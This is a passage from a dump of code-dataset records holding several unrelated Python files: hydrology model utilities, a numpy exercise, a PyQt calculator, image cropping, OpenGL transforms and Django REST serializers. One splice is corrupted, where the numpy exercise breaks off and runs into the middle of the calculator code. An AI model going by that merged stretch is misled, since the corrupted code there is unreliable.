pdf = _pdf\n\n with ExitStack() as stack:\n for param in model.get_dependents():\n value = params[param][\"value\"]\n stack.enter_context(param.set_value(value))\n return pdf(model, x)\n\n\ndef pll(minimizer, loss, pois) -> float:\n \"\"\" Compute minimum profile likelihood for given parameters values. \"\"\"\n with ExitStack() as stack:\n for p in pois:\n param = p.parameter\n stack.enter_context(param.set_value(p.value))\n param.floating = False\n minimum = minimizer.minimize(loss=loss)\n for p in pois:\n p.parameter.floating = True\n return minimum.fmin\n\n\ndef array2dataset(dataset_cls, obs, array, weights=None):\n \"\"\"\n dataset_cls: only used to get the class in which array/weights will be\n converted.\n \"\"\"\n\n if hasattr(dataset_cls, \"from_numpy\"):\n return dataset_cls.from_numpy(obs=obs, array=array, weights=weights)\n else:\n return dataset_cls(obs=obs, array=array, weights=weights)\n","sub_path":"skstats/hypotests/fitutils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"441189585","text":"#41. Змінній t привласнити значення істина, якщо максимальний елемент\r\n#одновимірного масиву єдиний і не перевищує наперед заданого числа а.\r\n\r\n#Підготував Суханов Андрій Олександрович, 122Б\r\n\r\nimport numpy as np #Імпортуємо numpy.\r\n\r\nwhile True:\r\n while True:\r\n #Користувач вводить \"задане число\".\r\n try:\r\n a=int(input('Задайте будь-яке число: '))\r\n except ValueError:\r\n print('Input numbers!! ')\r\n break\r\n\r\n print()\r\n #Ініціалізуємо масив нулями.\r\n A=np.zeros(8, dtype=int)\r\n\r\n t=False #Змінній t поки привласнимо значення False.\r\n count=0\r\n for i in range(len(A)): #Отримуємо доступ до елементів матриці А.\r\n try: #Перевірка на входження чисел.\r\n A[i] =int(input('Введіть елементи масиву: '))\r\n continue\r\n except ValueError:\r\n print('Input numbers!! 
')\r\n break\r\n\r\n A_max=max(A) #Знайдемо максимальне значення масиву.\r\n \r\n if A[i]==A_max:\r\n count+=1 #Перевірка чи єдиний цей максимальний елемент у масиві.\r\n if A_max= buttonPad['columns']:\n c = 0; r += 1\n\n # Layout\n mainLayout = QGridLayout()\n mainLayout.setSizeConstraint(QLayout.SetFixedSize)\n\n mainLayout.addWidget(self.display, 0, 0, 1, 2)\n mainLayout.addLayout(numLayout, 1, 0)\n mainLayout.addLayout(opLayout, 1, 1)\n mainLayout.addLayout(constLayout, 2, 0)\n mainLayout.addLayout(funcLayout, 2, 1)\n\n self.setLayout(mainLayout)\n\n self.setWindowTitle(\"My Calculator\")\n\n\n def buttonClicked(self):\n if 'clear' in init:\n self.display.clear()\n init.clear()\n\n button = self.sender()\n key = button.text()\n\n ## 06 + 3처럼 앞에 0이 있을 경우 에러처리가 나던 것을 처리하기 위해\n ## 맨앞에 0이 나타나지 않을때까지 0을 지우고 연산기호 뒤의 문자도 0이면 없애는 식으로 하려했으나\n ## 연산기호를 여러번 쓰는부분을 어떻게 코딩해야할지 몰라 남겼습니다.\n '''idx = 0\n if key == '=':\n if '+' or '-' or '*' or '/' in self.display.text():\n del0 = ''\n for i in range(1, len(self.display.text())):\n # 연산기호가 몇번째에 있는 지 확인\n if self.display.text()[i] == '+':\n idx = i\n if self.display.text()[i] == '-':\n idx = i\n if self.display.text()[i] == '*':\n idx = i\n if self.display.text()[i] == '/':\n idx = i\n\n del1 = ''\n ## 첫째 인자에 0이 있는 경우\n count = 1\n print(idx)\n while self.display.text()[0] == '0':\n count += 1\n # 첫째 인자 0제거\n for i in range(1, len(self.display.text())):\n del0 += self.display.text()[i]\n self.display.setText(del0)\n # 둘째 인자 0 유무 확인\n while del0[idx + 1] == '0':\n # 0이 있네?\n for i in range(1, len(del0)):\n if i == idx:\n continue\n else:\n del1 += del0[i]\n self.display.setText(del1)\n # 둘째 인자에 0이 없는 경우\n else:\n self.display.setText(str(eval(del0)))\n\n ## 첫재 인자에 0이 없는우 경우\n else:\n ## 둘째 인자에 0이 있는 경우\n if self.display.text()[idx + 1] == 0:\n print('22')\n\n ## 둘째 인장에 0이 없는 경우\n else:\n try:\n result = str(eval(self.display.text()))\n except:\n result = 'Error!'\n self.display.setText(result)'''\n if key == '=':\n\n ## 계산 입력 후 값 초기화를 위해 init라는 리스트를 생성\n ## ZeroDivisionErro 처리\n if '/' in self.display.text():\n try:\n result = str(eval(self.display.text()))\n except ZeroDivisionError:\n result = 'ZeroDivisionError'\n init.append('clear')\n self.display.setText(result)\n\n\n else:\n try:\n result = str(eval(self.display.text()))\n except:\n result = 'Error!'\n init.append('clear')\n\n self.display.setText(result)\n\n\n elif key == 'C':\n self.display.clear()\n elif key == constantList[0]:\n self.display.setText(self.display.text() + '3.141592')\n elif key == constantList[1]:\n self.display.setText(self.display.text() + '3E+8')\n elif key == constantList[2]:\n self.display.setText(self.display.text() + '340')\n elif key == constantList[3]:\n self.display.setText(self.display.text() + '1.5E+8')\n elif key == functionList[0]:\n n = self.display.text()\n value = calcFunctions.factorial(n)\n self.display.setText(str(value))\n init.append('clear')\n elif key == functionList[1]:\n n = self.display.text()\n value = calcFunctions.decToBin(n)\n self.display.setText(str(value))\n elif key == functionList[2]:\n n = self.display.text()\n value = calcFunctions.binToDec(n)\n self.display.setText(str(value))\n elif key == functionList[3]:\n n = self.display.text()\n value = calcFunctions.decToRoman(n)\n self.display.setText(str(value))\n else:\n self.display.setText(self.display.text() + key) ## 계산 입력\n\n\nif __name__ == '__main__':\n\n import sys\n init = []\n app = QApplication(sys.argv)\n calc = Calculator()\n calc.show()\n sys.exit(app.exec_())\n\n\n'''elif '(' or 
')' in self.display.text():\n result = ''\n while self.display.text()[0] == '(' or ')':\n for i in range(0, len(self.display.text()) - 1):\n self.display.text()[i] = self.display.text()[i+1]\n self.display.setText(self.display.text())\n while self.display.text()[-1] == '(' or ')':\n for i in range(0, len(self.display.text()) - 1):\n result += self.display.text()[i] '''","sub_path":"Week8/mycalc10.py","file_name":"mycalc10.py","file_ext":"py","file_size_in_byte":7693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"139720104","text":"# -*- coding: utf-8 -*-\n\"\"\"Misc utilities for MODFLOW.\"\"\"\n\n__all__ = [\"geotransform_from_flopy\"]\n\nimport pandas as pd\n\n\ndef sfr_rec_to_df(sfr):\n \"\"\"Convert flopy rec arrays for ds2 and ds6 to pandas dataframes.\"\"\"\n d = sfr.segment_data\n # multi index\n reform = {(i, j): d[i][j] for i in d.keys() for j in d[i].dtype.names}\n segdatadf = pd.DataFrame.from_dict(reform)\n segdatadf.columns.names = ['kper', 'col']\n reachdatadf = pd.DataFrame.from_records(sfr.reach_data)\n return segdatadf, reachdatadf\n\n\ndef sfr_dfs_to_rec(model, segdatadf, reachdatadf, set_outreaches=False,\n get_slopes=True, minslope=None):\n \"\"\"Convert sfr ds6 and ds2 to model sfr rec.\n\n Function to convert sfr ds6 (seg data) and ds2 (reach data) to model.sfr\n rec arrays option to update slopes from reachdata dataframes\n \"\"\"\n if get_slopes:\n print('Getting slopes')\n if minslope is None:\n minslope = 1.0e-4\n print('using default minslope of {}'.format(minslope))\n else:\n print('using specified minslope of {}'.format(minslope))\n # segs ds6\n # multiindex\n g = segdatadf.groupby(level=0, axis=1) # group multi index df by kper\n model.sfr.segment_data = g.apply(\n lambda k: k.xs(k.name, axis=1).to_records(index=False)).to_dict()\n # # reaches ds2\n model.sfr.reach_data = reachdatadf.to_records(index=False)\n if set_outreaches:\n # flopy method to set/fix outreaches from segment routing\n # and reach number information\n model.sfr.set_outreaches()\n if get_slopes:\n model.sfr.get_slopes(minimum_slope=minslope)\n # as of 08/03/2018 flopy plotting of sfr plots whatever is in\n # stress_period_data; add\n model.sfr.stress_period_data.data[0] = model.sfr.reach_data\n\n\ndef geotransform_from_flopy(m):\n \"\"\"Return GDAL-style geotransform from flopy model.\"\"\"\n try:\n import flopy\n except ImportError:\n raise ImportError('this method requires flopy')\n if not isinstance(m, flopy.mbase.BaseModel):\n raise TypeError(\"'m' must be a flopy model\")\n mg = m.modelgrid\n if mg.angrot != 0.0:\n raise NotImplementedError('rotated grids not supported')\n if mg.delr.min() != mg.delr.max():\n raise ValueError('delr not uniform')\n if mg.delc.min() != mg.delc.max():\n raise ValueError('delc not uniform')\n a = mg.delr[0]\n b = 0.0\n c = mg.xoffset\n d = 0.0\n e = -mg.delc[0]\n f = mg.yoffset - e * mg.nrow\n # GDAL order of affine transformation coefficients\n return c, a, b, f, d, e\n","sub_path":"swn/modflow/_misc.py","file_name":"_misc.py","file_ext":"py","file_size_in_byte":2587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"528337196","text":"from PIL import Image\nimport os\n\ninput_directory = 'preprocessed-images-step-two'\noutput_directory = 'preprocessed-images-step-three'\n\nfor fh in os.listdir(input_directory):\n\tkey = 0\n\tif fh != '.DS_Store':\n\t\timg = Image.open(os.path.join(input_directory, fh))\t\n\t\twidth, height = img.size\n\t\tiwidth 
= int(width)\n\t\tiheight = int(height * 0.80)\n\t\tfor i in range(0, height, iheight):\n\t\t\tfor j in range(0, width, iwidth):\n\t\t\t\tif i == 0:\n\t\t\t\t\tbox = (j, height - iheight, j + iwidth, height)\n\t\t\t\t\tcropped_im = img.crop(box)\n\t\t\t\t\tcropped_im.save(os.path.join(output_directory, \"{}_crop_{}\".format(key, fh)))\n\t\t\t\t\tkey += 1\n\t\t\t\t\t\n\t\t\t\t\n\n\n","sub_path":"api/preprocess_images_step_two.py","file_name":"preprocess_images_step_two.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"367148662","text":"from random import random\nfrom math import sqrt\nimport time\ndarts = 100000\nhits=0\ntime.clock()\nfor i in range(1,darts+1):\n x,y=random(),random()\n dist=sqrt(x**2+y**2)\n if dist<=1.0:\n hits+=1\npi=4*(hits/darts)\nprint(\"Pi'value is {}\".format(pi) )\nprint(\"it takes :{:.5f}s\".format(time.clock()))\n","sub_path":"嵩天程序设计基础/pi.py","file_name":"pi.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"444633123","text":"import numpy as np\nimport glfw\nfrom OpenGL.GL import *\n\ndegree = 10.0 * np.pi / 180\ngComposedM = np.identity(3)\n\ndef key_callback(window, key, scancode, action, mods):\n global gComposedM\n if key == glfw.KEY_1:\n if action == glfw.PRESS:\n gComposedM = np.identity(3)\n elif key == glfw.KEY_Q:\n if action == glfw.PRESS:\n gComposedM[0][2] -= 0.1\n elif key == glfw.KEY_E:\n if action == glfw.PRESS:\n gComposedM[0][2] += 0.1\n elif key == glfw.KEY_A:\n if action == glfw.PRESS:\n counterClock = np.array([\n [np.cos(degree), -np.sin(degree), 0.],\n [np.sin(degree), np.cos(degree), 0.],\n [0., 0., 1.]\n ])\n gComposedM = gComposedM @ counterClock\n elif key == glfw.KEY_D:\n if action == glfw.PRESS:\n clock = np.array([\n [np.cos(degree), np.sin(degree), 0.],\n [-np.sin(degree), np.cos(degree), 0.],\n [0., 0., 1.]\n ])\n gComposedM = gComposedM @ clock\n elif key == glfw.KEY_W:\n if action == glfw.PRESS:\n scale = np.array([\n [0.9, 0., 0.],\n [0., 1., 0.],\n [0., 0., 1.]\n ])\n gComposedM = scale @ gComposedM\n elif key == glfw.KEY_S:\n if action == glfw.PRESS:\n counterClock = np.array([\n [np.cos(degree), -np.sin(degree), 0.],\n [np.sin(degree), np.cos(degree), 0.],\n [0., 0., 1.]\n ])\n gComposedM = counterClock @ gComposedM\n\ndef render(T):\n glClear(GL_COLOR_BUFFER_BIT)\n glLoadIdentity()\n # draw coordinate\n glBegin(GL_LINES)\n glColor3ub(255, 0, 0)\n glVertex2fv(np.array([0., 0.]))\n glVertex2fv(np.array([1., 0.]))\n glColor3ub(0, 255, 0)\n glVertex2fv(np.array([0., 0.]))\n glVertex2fv(np.array([0., 1.]))\n glEnd()\n # draw triangle\n glBegin(GL_TRIANGLES)\n glColor3ub(255, 255, 255)\n glVertex2fv( (T @ np.array([.0, .5, 1.]))[:-1])\n glVertex2fv( (T @ np.array([.0, .0, 1.]))[:-1])\n glVertex2fv( (T @ np.array([.5, .0, 1.]))[:-1])\n glEnd()\n\ndef main():\n if not glfw.init():\n return \n window = glfw.create_window(480, 480, \"2016025423-3-1\", None, None)\n if not window:\n glfw.terminate()\n return\n\n glfw.set_key_callback(window, key_callback)\n glfw.make_context_current(window)\n \n while not glfw.window_should_close(window):\n glfw.poll_events()\n render(gComposedM)\n \n glfw.swap_buffers(window)\n\n glfw.terminate()\n\nif __name__ == \"__main__\":\n main() 
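\n\n# Note (editor): A/D post-multiply gComposedM (rotation in the local frame),\n# while W/S pre-multiply it (scale/rotation applied in the global frame).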
\n","sub_path":"assignment03/2016025423-3-1.py","file_name":"2016025423-3-1.py","file_ext":"py","file_size_in_byte":2666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"549158283","text":"from rest_framework import serializers, exceptions\nfrom core.utils import get_age_fun, test_thumbnail_image_url\nfrom crawler.models import CrawlProduct, CrawlDetailImage\nfrom mypage.serializers import SimpleUserInfoSerializer, DeliveryPolicyInfoSerializer\nfrom products.category.models import PopularTempKeyword\nfrom products.category.serializers import ColorSerializer, FirstCategorySerializer, SecondCategorySerializer, \\\n SizeSerializer\nfrom products.models import Product, ProductImages, ProductLike, ProdThumbnail\nfrom products.reply.serializers import ProductReplySerializer\nfrom products.shopping_mall.serializers import ShoppingMallSerializer\nfrom products.supplymentary.models import PurchasedReceipt, PurchasedTime\nfrom products.utils import check_product_url\nfrom user_activity.models import RecentlySearchedKeyword\n\n\nclass ProductFirstSaveSerializer(serializers.ModelSerializer):\n seller = serializers.HiddenField(default=serializers.CurrentUserDefault())\n\n class Meta:\n model = Product\n fields = ['seller', 'condition', 'shopping_mall', 'product_url']\n\n\nclass CrawlDataSerializer(serializers.ModelSerializer):\n \"\"\"\n 크롤링 데이터를 다루는 serializer 입니다.\n \"\"\"\n class Meta:\n model = CrawlProduct\n fields = ['thumbnail_image_url',\n 'product_name',\n 'int_price']\n\n\nclass TempCrawlDataSerializer(serializers.ModelSerializer):\n \"\"\"\n 크롤링 실패시 임시 데이터를 다루는 serializer 입니다.\n \"\"\"\n thumbnail_image_url = serializers.SerializerMethodField(read_only=True)\n product_name = serializers.SerializerMethodField(read_only=True)\n int_price = serializers.SerializerMethodField(read_only=True)\n\n class Meta:\n model = Product\n fields = ['thumbnail_image_url',\n 'product_name',\n 'int_price']\n\n @staticmethod\n def get_thumbnail_image_url(obj):\n return None\n\n @staticmethod\n def get_product_name(obj):\n return None\n\n @staticmethod\n def get_int_price(obj):\n return None\n\n\nclass ProductMainSerializer(serializers.ModelSerializer):\n \"\"\"\n 상품 메인페이지 및 찜한 상품 조회에 사용하는 serializer 입니다.\n [UPDATED] 20.08.06 : 할인율, 상품상태 등\n \"\"\"\n thumbnail_image_url = serializers.SerializerMethodField(read_only=True)\n is_owner = serializers.SerializerMethodField()\n sold = serializers.SerializerMethodField()\n\n # for develop\n price = serializers.SerializerMethodField()\n name = serializers.SerializerMethodField()\n\n discount_rate = serializers.SerializerMethodField()\n shopping_mall = serializers.SerializerMethodField()\n origin_price = serializers.SerializerMethodField()\n receipt_certify = serializers.SerializerMethodField()\n\n class Meta:\n model = Product\n fields = ['id',\n 'name',\n 'thumbnail_image_url',\n 'price',\n 'sold',\n 'is_owner',\n 'discount_rate',\n 'shopping_mall',\n 'origin_price',\n 'condition',\n 'receipt_certify'\n ]\n\n @staticmethod\n def get_receipt_certify(obj):\n if obj.receipt:\n return True\n return False\n\n @staticmethod\n def get_shopping_mall(obj):\n shopping_mall = obj.shopping_mall\n return ShoppingMallSerializer(shopping_mall).data\n\n def get_origin_price(self, obj):\n if not obj.crawl_product_id:\n return None\n if CrawlProduct.objects.filter(id=obj.crawl_product_id).exists():\n origin_price = CrawlProduct.objects.filter(id=obj.crawl_product_id).last().int_price\n else:\n return None\n return origin_price\n\n 
def get_price(self, obj):\n if obj.price:\n return obj.price\n return 0\n\n def get_discount_rate(self, obj):\n if not obj.crawl_product_id:\n return None\n if CrawlProduct.objects.filter(id=obj.crawl_product_id).exists():\n origin_price = CrawlProduct.objects.filter(id=obj.crawl_product_id).last().int_price\n else:\n return None\n price = obj.price\n rate = round(abs(origin_price - price) / origin_price, 2) * 100\n if not origin_price - price > 0:\n return None\n return rate\n\n def get_name(self, obj):\n if obj.name:\n return obj.name\n return '이름 없는 상품'\n\n def get_sold(self, obj):\n return obj.status.sold\n\n @staticmethod\n def get_thumbnail_image_url(obj):\n # TODO : filter Crawled image ratio\n if obj.crawl_product_id:\n c_product = CrawlProduct.objects.filter(id=obj.crawl_product_id)\n if c_product.exists():\n return CrawlProduct.objects.filter(id=obj.crawl_product_id).first().thumbnail_image_url\n\n if hasattr(obj, 'prodthumbnail'):\n return obj.prodthumbnail.image_url\n\n return obj.images.first().image_url\n\n def get_is_owner(self, obj):\n user = self.context['request'].user\n if obj.seller == user:\n return True\n return False\n\n\nclass ProductRetrieveSerializer(serializers.ModelSerializer):\n \"\"\"\n 상품 상세페이지 조회에 사용하는 serializer 입니다.\n \"\"\"\n thumbnail_image_url = serializers.SerializerMethodField()\n # crawl_data = serializers.SerializerMethodField()\n int_price = serializers.SerializerMethodField()\n receipt_image_url = serializers.SerializerMethodField()\n # name = serializers.SerializerMethodField()\n discount_rate = serializers.SerializerMethodField()\n is_receipt = serializers.SerializerMethodField()\n views = serializers.SerializerMethodField()\n like_count = serializers.SerializerMethodField()\n is_liked = serializers.SerializerMethodField()\n sold = serializers.SerializerMethodField()\n\n images = serializers.SerializerMethodField()\n crawled_images = serializers.SerializerMethodField()\n\n first_category = serializers.SerializerMethodField() # category 어떻게 보여줄지?\n second_category = serializers.SerializerMethodField() # category 어떻게 보여줄지?\n size = serializers.SerializerMethodField() # size name!\n color = serializers.SerializerMethodField()\n size_capture_image = serializers.SerializerMethodField() # 없으면 None\n purchased_year = serializers.SerializerMethodField()\n purchased_month = serializers.SerializerMethodField()\n\n shopping_mall = serializers.SerializerMethodField()\n\n replies = serializers.SerializerMethodField()\n\n age = serializers.SerializerMethodField() # ex: 3 days ago\n\n delivery_policy = serializers.SerializerMethodField()\n seller = SimpleUserInfoSerializer()\n\n # other_seller_products = serializers.SerializerMethodField() # def 안에 simple product serializer 활용하여 data return\n # related_products = serializers.SerializerMethodField() # \"\n\n class Meta:\n model = Product\n fields = ['id',\n 'possible_upload', # True 이면 보이고, False 이면 dim 처리\n 'sold',\n 'is_liked',\n 'thumbnail_image_url',\n 'int_price',\n 'valid_url', #\n 'age', #\n 'views', #\n 'like_count',\n # 'crawl_data', #\n 'is_receipt', #\n 'shopping_mall', # 쇼핑몰 로고?\n 'name', 'price', 'discount_rate', #\n 'free_delivery',\n 'content',\n 'images', #\n 'crawled_images',\n 'receipt_image_url', #\n 'first_category', #\n 'second_category', #\n 'size', #\n 'color',\n # 'purchased_year', #\n 'purchased_year', #\n 'purchased_month', #\n 'replies',\n 'product_url',\n 'delivery_policy',\n 'seller',\n 'size_capture_image',\n 'condition'\n # 'other_seller_products',\n # 'related_products'\n ]\n\n 
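# NOTE (editor): several getters below re-query CrawlProduct by crawl_product_id;\n    # caching one lookup per instance would avoid the repeated database hits.\n    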
@staticmethod\n def get_thumbnail_image_url(obj):\n if not obj.crawl_product_id:\n return obj.images.first().image_url\n return CrawlProduct.objects.get(id=obj.crawl_product_id).thumbnail_image_url\n\n @staticmethod\n def get_valid_url(obj):\n url = obj.product_url\n valid_url = check_product_url(url)\n if valid_url:\n return True\n return False\n\n @staticmethod\n def get_age(obj):\n return get_age_fun(obj)\n\n @staticmethod\n def get_sold(obj):\n status = obj.status\n return status.sold\n\n @staticmethod\n def get_views(obj):\n if hasattr(obj, 'views'):\n return obj.views.view_counts\n return 0\n\n @staticmethod\n def get_like_count(obj):\n if obj.liked.exists():\n return obj.liked.all().count()\n return 0\n\n @staticmethod\n def get_int_price(obj):\n if obj.crawl_product_id:\n return CrawlProduct.objects.get(id=obj.crawl_product_id).int_price\n return None\n\n # @staticmethod\n # def get_crawl_data(obj):\n # if obj.crawl_product_id:\n # serializer = CrawlDataSerializer(CrawlProduct.objects.get(id=obj.crawl_product_id))\n # else:\n # serializer = TempCrawlDataSerializer(obj)\n # return serializer.data\n\n def get_is_liked(self, obj):\n user = self.context['request'].user\n if user.is_anonymous:\n return False\n liked = ProductLike.objects.filter(product=obj, user=user)\n if liked.exists():\n liked = liked.last()\n return liked.is_liked\n return False\n\n @staticmethod\n def get_is_receipt(obj):\n if obj.receipt:\n return True\n return False\n\n @staticmethod\n def get_discount_rate(obj):\n if obj.crawl_product_id:\n if CrawlProduct.objects.filter(id=obj.crawl_product_id).exists():\n crawl_price = CrawlProduct.objects.filter(id=obj.crawl_product_id).last().int_price\n else:\n return None\n price = obj.price\n if not price:\n return None\n rate = round(abs(crawl_price - price)/crawl_price, 2) * 100\n if crawl_price - price > 0:\n return rate\n return None\n\n @staticmethod\n def get_images(obj):\n if not obj.images.exists():\n return []\n images = obj.images.all()\n return ProductImagesRetrieveSerializer(images, many=True).data\n\n @staticmethod\n def get_crawled_images(obj):\n if not obj.crawl_product_id:\n return []\n c_product = CrawlProduct.objects.get(id=obj.crawl_product_id)\n d_images = CrawlDetailImage.objects.filter(product=c_product)\n\n if d_images.exclude(detail_image_crop='').exists():\n crop_image_id = d_images.exclude(detail_image_crop='').values_list('pk', flat=True)\n # to unify return formats. 
obj to queryset\n crop_image = CrawlDetailImage.objects.filter(id__in=crop_image_id)\n return CrawlProductCropImageRetrieveSerializer(crop_image, many=True).data\n\n # logic 필요\n d_image_center_id = int(round(d_images.count() / 2))\n if d_image_center_id < 4:\n detail_images = d_images\n else:\n detail_images = d_images[d_image_center_id-4:d_image_center_id+4]\n return CrawlProductImagesRetrieveSerializer(detail_images, many=True).data\n\n @staticmethod\n def get_receipt_image_url(obj):\n if obj.receipt:\n return obj.receipt.image_url\n else:\n return None\n\n @staticmethod\n def get_category(obj):\n if obj.category:\n f_category_name = obj.category.first_category.name\n return f_category_name + '>' + obj.category.name\n return None\n\n @staticmethod\n def get_first_category(obj):\n if obj.category:\n f_category = obj.category.first_category\n serializer = FirstCategorySerializer(f_category)\n return serializer.data\n return None\n\n @staticmethod\n def get_second_category(obj):\n if obj.category:\n serializer = SecondCategorySerializer(obj.category)\n return serializer.data\n return None\n\n @staticmethod\n def get_size(obj):\n if obj.size:\n serializer = SizeSerializer(obj.size)\n return serializer.data\n return None\n\n @staticmethod\n def get_color(obj):\n if obj.color:\n return ColorSerializer(obj.color).data\n return None\n\n @staticmethod\n def get_shopping_mall(obj):\n shopping_mall = obj.shopping_mall\n return ShoppingMallSerializer(shopping_mall).data\n\n @staticmethod\n def get_replies(obj):\n if obj.questions.exists():\n question = obj.questions.first()\n return ProductReplySerializer(question).data\n return None\n\n @staticmethod\n def get_purchased_year(obj):\n if obj.purchased_time:\n time = obj.purchased_time\n year = time.year\n return year\n return None\n\n @staticmethod\n def get_purchased_month(obj):\n if obj.purchased_time:\n time = obj.purchased_time\n month = time.month\n return month\n return None\n\n @staticmethod\n def get_delivery_policy(obj):\n seller = obj.seller\n if hasattr(seller, 'delivery_policy'):\n return DeliveryPolicyInfoSerializer(seller.delivery_policy).data\n return None\n\n @staticmethod\n def get_size_capture_image(obj):\n return None\n\n # @staticmethod\n # def get_other_seller_products(obj):\n # seller = obj.seller\n # other_products = Product.objects.filter(is_active=True, possible_upload=True) \\\n # .select_related('size', 'size__category', 'seller', 'seller__profile') \\\n # .exclude(id=obj.id) \\\n # .filter(seller=seller, status__sold=False) \\\n # .distinct().order_by('?')[:5]\n #\n # if not other_products:\n # return []\n # return RelatedProductSerializer(other_products, many=True).data\n #\n # @staticmethod\n # def get_related_products(obj):\n # second_category = obj.category\n # related_products = Product.objects.filter(is_active=True, possible_upload=True, temp_save=False) \\\n # .select_related('size', 'size__category', 'seller', 'seller__profile') \\\n # .exclude(id=obj.id) \\\n # .filter(category=second_category, status__sold=False) \\\n # .distinct().order_by('?')[:5]\n # if not related_products:\n # return []\n # return RelatedProductSerializer(related_products, many=True).data\n\n\nclass RelatedProductSerializer(serializers.ModelSerializer):\n thumbnail_image_url = serializers.SerializerMethodField()\n size = serializers.SerializerMethodField()\n\n class Meta:\n model = Product\n fields = ['id', 'thumbnail_image_url', 'size', 'price', 'name']\n\n @staticmethod\n def get_thumbnail_image_url(obj):\n if not obj.crawl_product_id:\n 
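# no crawl record: prefer the saved thumbnail, else fall back to the first image\n            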
if hasattr(obj, 'prodthumbnail'):\n            return obj.prodthumbnail.image_url\n        # for develop\n        try:\n            return obj.images.first().image_url\n        except Exception:\n            return test_thumbnail_image_url\n        return CrawlProduct.objects.get(id=obj.crawl_product_id).thumbnail_image_url\n\n    @staticmethod\n    def get_size(obj):\n        return obj.size.size_name\n\n\nclass ProductUploadDetailInfoSerializer(serializers.ModelSerializer):\n    \"\"\"\n    Serializer that exposes the crawled info plus the (optional) purchase receipt key during the product upload flow.\n    Not used when loading a temporary save.\n    \"\"\"\n    crawl_data = serializers.SerializerMethodField()\n    receipt_image_url = serializers.SerializerMethodField()\n\n    class Meta:\n        model = Product\n        fields = ['id',\n                  'crawl_data',\n                  'receipt_image_url',\n                  ]\n\n    @staticmethod\n    def get_receipt_image_url(obj):\n        if obj.receipt:\n            return obj.receipt.image_url\n        else:\n            return None\n\n    @staticmethod\n    def get_crawl_data(obj):\n        if obj.crawl_product_id:\n            serializer = CrawlDataSerializer(CrawlProduct.objects.get(id=obj.crawl_product_id))\n        else:\n            serializer = TempCrawlDataSerializer(obj)\n        return serializer.data\n\n\nclass ProductTempUploadDetailInfoSerializer(serializers.ModelSerializer):\n    \"\"\"\n    Probably used when loading a temporary save. This could have been merged with UploadDetail, but it is kept\n    separate for now because, for temporary saves, the client will likely need a different action per upload type.\n    * Note: if a name was entered, use name; otherwise use the crawl product name (the product name inside crawl data is not used)\n    \n    ** Fields that reference other models, such as category and purchased_time, are returned as an int (id); how the client should handle this still needs discussion\n    \"\"\"\n    receipt_image_url = serializers.SerializerMethodField()\n    name = serializers.SerializerMethodField()\n    crawl_data = serializers.SerializerMethodField()\n    images = serializers.SerializerMethodField()\n    purchased_year = serializers.SerializerMethodField()\n    purchased_month = serializers.SerializerMethodField()\n\n    class Meta:\n        model = Product\n        fields = ['id', 'condition', 'shopping_mall', 'product_url',\n                  'crawl_data',\n                  'receipt_image_url',\n                  'images',\n                  'name',\n                  'price', 'content', 'free_delivery',\n                  'category', 'color', 'size', 'purchased_year', 'purchased_month'\n                  ]\n\n    @staticmethod\n    def get_crawl_data(obj):\n        if obj.crawl_product_id:\n            serializer = CrawlDataSerializer(CrawlProduct.objects.get(id=obj.crawl_product_id))\n        else:\n            serializer = TempCrawlDataSerializer(obj)\n        return serializer.data\n\n    @staticmethod\n    def get_receipt_image_url(obj):\n        if obj.receipt:\n            return obj.receipt.image_url\n        else:\n            return None\n\n    @staticmethod\n    def get_images(obj):\n        if not obj.images.exists():\n            return []\n        images = obj.images.all()\n        return ProductImagesRetrieveSerializer(images, many=True).data\n\n    @staticmethod\n    def get_name(obj):\n        if obj.name:\n            return obj.name\n        if obj.crawl_product_id:\n            return CrawlProduct.objects.get(id=obj.crawl_product_id).product_name\n        return None\n\n    @staticmethod\n    def get_purchased_month(obj):\n        if obj.purchased_time:\n            time = obj.purchased_time\n            month = time.month\n            return month\n        return None\n\n    @staticmethod\n    def get_purchased_year(obj):\n        if obj.purchased_time:\n            time = obj.purchased_time\n            year = time.year\n            return year\n        return None\n\n\nclass ProductSaveSerializer(serializers.ModelSerializer):\n    \"\"\"\n    Serializer used for temporary saves and the final save of a product.\n    * For purchased time, purchased_year and purchased_month are received and stored separately on the server.\n    * For category, the id of the second_category is received.\n    \"\"\"\n    class Meta:\n        model = Product\n        fields = ['name', 'price', 'content', 'free_delivery',\n                  'category', 'color', 'size', 'possible_upload',\n                  'temp_save' # passed in from the view\n                  ]\n\n    def update(self, obj, validated_data):\n        year = 
validated_data.pop('purchased_year', None)\n        month = validated_data.pop('purchased_month', None)\n        product = super(ProductSaveSerializer, self).update(obj, validated_data)\n        # purchased time save\n        if year and month:\n            time, _ = PurchasedTime.objects.get_or_create(year=int(year), month=int(month))\n            product.purchased_time = time\n            product.save()\n\n        return product\n\n\nclass ReceiptSaveSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = PurchasedReceipt\n        fields = ['receipt_image_key']\n\n\nclass ProdThumbnailSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = ProdThumbnail\n        fields = ['thumbnail', ]\n\n\nclass ProductImageSaveSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = ProductImages\n        fields = '__all__'\n\n\nclass ProductImagesRetrieveSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = ProductImages\n        fields = ['image_url', ]\n\n\nclass CrawlProductImagesRetrieveSerializer(serializers.ModelSerializer):\n    image_url = serializers.SerializerMethodField()\n\n    class Meta:\n        model = CrawlDetailImage\n        fields = ['image_url', ]\n\n    def get_image_url(self, obj):\n        return obj.detail_image_url\n\n\nclass CrawlProductCropImageRetrieveSerializer(serializers.ModelSerializer):\n    image_url = serializers.SerializerMethodField()\n\n    class Meta:\n        model = CrawlDetailImage\n        fields = ['image_url', ]\n\n    def get_image_url(self, obj):\n        return obj.detail_image_crop_url\n\n\nclass LikeSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = ProductLike\n        fields = ['is_liked']\n\n\nclass 